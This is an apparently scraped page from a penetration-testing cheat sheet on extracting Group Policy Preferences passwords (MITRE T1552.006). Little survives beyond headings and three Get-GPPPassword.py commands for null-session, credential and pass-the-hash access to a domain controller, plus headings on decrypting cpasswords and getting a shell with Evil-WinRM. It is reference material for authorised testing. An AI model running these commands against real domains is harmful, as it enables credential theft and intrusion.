Group Policy Preferences
MITRE ATT&CK™ Sub-technique T1552.006
Theory
Practical
# with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
# with cleartext credentials
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
# pass-the-hash
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
SYSVOL
Decrypt the Password (Manual)
Decrypt CPassword (Tool)
Get Remote Shell Access
Evil-WinRM
REFERENCES
Last updated